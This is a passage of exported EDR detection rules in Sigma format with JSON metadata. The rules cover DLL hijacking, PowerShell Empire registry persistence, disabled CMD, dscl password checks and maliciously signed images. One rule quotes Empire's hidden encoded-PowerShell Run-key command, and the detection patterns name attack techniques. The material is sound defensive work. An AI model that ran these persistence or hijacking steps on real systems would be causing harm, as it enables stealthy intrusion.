library_event\ndetection:\n selection:\n Image|endswith: '\\deploymentcsphelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DismApi.DLL'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "edbcd2f2-a49b-47c3-818f-df7d306a6041",
"rule_name": "DLL Hijacking via deploymentcsphelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via deploymentcsphelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ede63422-8007-49b4-a36f-8bfc8a82cc7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076698Z",
"creation_date": "2026-03-23T11:45:34.076700Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076704Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/registry.py",
"https://medium.com/@brsdncr/forensic-investigation-operations-windows-base-iii-64a7afec9f69",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_empire_powershell_registry_elevated_persistence.yml",
"content": "title: PowerShell Empire Elevated Registry Persistence Added\nid: ede63422-8007-49b4-a36f-8bfc8a82cc7c\ndescription: |\n Detects suspicious registry persistences in the local machine software hive that are related to Empire Attack Framework.\n Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent.\n It is recommended to investigate the process that set the registry value for suspicious activities as well as to look for the registry modification to understand the objective of this persistence.\nreferences:\n - https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/registry.py\n - https://medium.com/@brsdncr/forensic-investigation-operations-windows-base-iii-64a7afec9f69\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2020/10/14\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1547.001\n - attack.t1059.001\n - attack.t1112\n - attack.s0363\n - classification.Windows.Source.Registry\n - classification.Windows.Framework.Empire\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*'\n\n # by default, this is \"Updater\" value with this content:\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x=$((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x\"\n selection_variant1:\n TargetObject|endswith: 'Updater'\n Details|contains: 'powershell -Win Hidden -enc '\n selection_variant2:\n Details|contains|all:\n - '((gp '\n - 'powershell -Win Hidden -enc '\n\n condition: selection and 1 of selection_variant*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ede63422-8007-49b4-a36f-8bfc8a82cc7c",
"rule_name": "PowerShell Empire Elevated Registry Persistence Added",
"rule_description": "Detects suspicious registry persistences in the local machine software hive that are related to Empire Attack Framework.\nEmpire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent.\nIt is recommended to investigate the process that set the registry value for suspicious activities as well as to look for the registry modification to understand the objective of this persistence.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "edfb92d9-828d-42c7-8a38-430fe250a841",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078760Z",
"creation_date": "2026-03-23T11:45:34.078762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078767Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_filescrn.yml",
"content": "title: DLL Hijacking via filescrn.exe\nid: edfb92d9-828d-42c7-8a38-430fe250a841\ndescription: |\n Detects potential Windows DLL Hijacking via filescrn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'filescrn.exe'\n ImageLoaded|endswith:\n - '\\atl.dll'\n - '\\mfc42u.dll'\n - '\\srmtrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "edfb92d9-828d-42c7-8a38-430fe250a841",
"rule_name": "DLL Hijacking via filescrn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via filescrn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee3dd02e-2672-4db4-bb60-1bc934cf1de4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621457Z",
"creation_date": "2026-03-23T11:45:34.621458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621463Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_cmd.yml",
"content": "title: CMD Disabled\nid: ee3dd02e-2672-4db4-bb60-1bc934cf1de4\ndescription: |\n Detects the disabling of the Windows Command Prompt (CMD) for a said user.\n Attackers can use this registry modification to prevent users from starting CMD, either to hide malicious payloads, or to prevent users from killing them.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableCMD'\n Details|contains: 'DWORD'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_userlock:\n ProcessOriginalFileName: 'UlAgent.dll'\n ProcessSignature: 'IS Decisions SA'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee3dd02e-2672-4db4-bb60-1bc934cf1de4",
"rule_name": "CMD Disabled",
"rule_description": "Detects the disabling of the Windows Command Prompt (CMD) for a said user.\nAttackers can use this registry modification to prevent users from starting CMD, either to hide malicious payloads, or to prevent users from killing them.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee42a801-9d93-4038-8e24-6e79ef2d85bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095781Z",
"creation_date": "2026-03-23T11:45:34.095783Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095788Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_conhost.yml",
"content": "title: DLL Hijacking via CONHOST.exe\nid: ee42a801-9d93-4038-8e24-6e79ef2d85bc\ndescription: |\n Detects potential Windows DLL Hijacking via CONHOST.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONHOST.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msctf.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee42a801-9d93-4038-8e24-6e79ef2d85bc",
"rule_name": "DLL Hijacking via CONHOST.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CONHOST.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee43664e-b49f-4bb1-94c6-9e4cde2134fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094855Z",
"creation_date": "2026-03-23T11:45:34.094857Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094861Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1078/001/",
"https://attack.mitre.org/techniques/T1078/002/",
"https://attack.mitre.org/techniques/T1078/003/"
],
"name": "t1087_001_dscl_password_validation.yml",
"content": "title: Users Password Validation via dscl\nid: ee43664e-b49f-4bb1-94c6-9e4cde2134fa\ndescription: |\n Detects suspicious password validation using dscl.\n Adversaries may use dscl to validate gathered user's passwords.\n It is recommended to check for malicious behaviors by the process launching dscl.\nreferences:\n - https://attack.mitre.org/techniques/T1078/001/\n - https://attack.mitre.org/techniques/T1078/002/\n - https://attack.mitre.org/techniques/T1078/003/\ndate: 2024/06/11\nmodified: 2025/08/26\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - attack.t1087.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/dscl'\n ParentImage|contains: '?'\n CommandLine|contains:\n - 'dscl /Local/Default authonly '\n - 'dscl /Local/Default -authonly '\n - 'dscl . -authonly '\n - 'dscl . authonly '\n\n exclusion_macoslaps:\n ProcessParentImage: '/usr/local/laps/macOSLAPS'\n\n exclusion_jumpcloud:\n ProcessParentImage: '/opt/jc/bin/jumpcloud-agent'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee43664e-b49f-4bb1-94c6-9e4cde2134fa",
"rule_name": "Users Password Validation via dscl",
"rule_description": "Detects suspicious password validation using dscl.\nAdversaries may use dscl to validate gathered user's passwords.\nIt is recommended to check for malicious behaviors by the process launching dscl.\n",
"rule_creation_date": "2024-06-11",
"rule_modified_date": "2025-08-26",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001",
"attack.t1087.002",
"attack.t1087.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee61a59b-83ce-42a2-9df8-1e4845d704f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625743Z",
"creation_date": "2026-03-23T11:45:34.625745Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://twitter.com/th3_protoCOL/status/1587823143854698497",
"https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
"https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
"https://twitter.com/jaydinbas/status/1646475092006785027",
"https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_image_malicious_certificate.yml",
"content": "title: Image Loaded Signed with Malicious Certificate\nid: ee61a59b-83ce-42a2-9df8-1e4845d704f0\ndescription: |\n Detects loading of an image signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the loaded DLL for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/11/17\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ImageSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - '9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - '0DD4552A9AABC00F61E619F4812DAFADCAA48715'\n # https://blog.talosintelligence.com/old-certificate-new-signature/\n - '6BC9649368643760190234FBB8395F4CACC2C9CB' # WoSign Class 3 Code Signing CA - 绍兴易游网络科技有限公司\n - '8B91C4BA4546F16D407CEB58090E1C8D82CAF2AC' # thawte SHA256 Code Signing CA - 北京汇聚四海商贸有限公司\n - 'FE6885F629D920DCE90FB03F0DB7B95709811C0D' # thawte SHA256 Code Signing CA - 善君 韦\n - 'F981DB345F885899FAE9382D7D3BCAF75B1CE797' # VeriSign Class 3 Code Signing 2010 CA - Beijing Chunbai Technology Development Co., Ltd\n - 'C61A221389C98EE2FBC0E57A62DEE5A915E6C509' # VeriSign Class 3 Code Signing 2010 CA - Fuqing Yuntan Network Tech Co.,Ltd.\n - '7B69FF55D3C39BD7D67A10F341C1443425F0C83F' # VeriSign Class 3 Code Signing 2010 CA - Zhuhai liancheng Technology Co., Ltd.\n - '864FD20B322E8C7CDB0D7AA69C8475F09D602C3D' # VeriSign Class 3 Code Signing 2010 CA - Baoji zhihengtaiye co.,ltd\n - '85C58500333C98954160FCA3EE9A26B659A5F451' # VeriSign Class 3 Code Signing 2010 CA - Jiangsu innovation safety assessment Co., Ltd.\n - 'D715230B535C8937B469632EC6158761FD18AD21' # VeriSign Class 3 Code Signing 2010 CA - Shenzhen Luyoudashi Technology Co., Ltd.\n - 'DF788AA00EB400B552923518108EB1D4F5B7176B' # VeriSign Class 3 Code Signing 2010 CA - Beijing JoinHope Image Technology Ltd.\n - '775141B89F48B71DADC19F13011A46E537E7029C' # Thawte Code Signing CA - NHN USA Inc.\n # https://twitter.com/1ZRR4H/status/1699923793077055821\n # https://bazaar.abuse.ch/sample/1fc7dbbff1ea28f00d8c32de90c2559e4aa3629d26627094e92ff111e1092875/\n - '21A97512A2959B0E74729BE220102AEF1DCF56FD'\n # Koi Loader\n # https://www.virustotal.com/gui/file/a43d460e43d27df91c02292c1e7d5d7920c2b3dc3b2749b1bbc7f28657588947\n - '2A0B1BEDF4CCC933A5FDB885EDA8211F9B258ABE'\n # https://x.com/tangent65536/status/1914373135337701588\n - '22EACBF575EA3FF19A6F639E80E8768405C9BDFE'\n # https://expel.com/blog/you-dont-find-manualfinder-manualfinder-finds-you/\n - '99201EEE9807D24851026A8E8884E4C40245FAC7'\n # https://www.virustotal.com/gui/file/f9dd0b57a5c133ca0c4cab3cca1ac8debdc4a798b452167a1e5af78653af00c1\n - '9A6EE51A6A437603ACEE9ADC5F1A5F13329A7E59'\n # https://securelist.com/honeymyte-kernel-mode-rootkit/118590/\n # https://www.virustotal.com/gui/file/dc8b123d91a29661c92b0de3d4f06e0ca17b0633b87e45c09245d82bb84f3860\n - '1F33285626E81F4845936C7A2A55A46F6DADA651'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee61a59b-83ce-42a2-9df8-1e4845d704f0",
"rule_name": "Image Loaded Signed with Malicious Certificate",
"rule_description": "Detects loading of an image signed with a certificate that was used by malicious actors.\nThis can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\nIt is recommended to analyze the loaded DLL for malicious contents.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-12-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee92b750-faf4-4136-bc28-a275241bd6d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
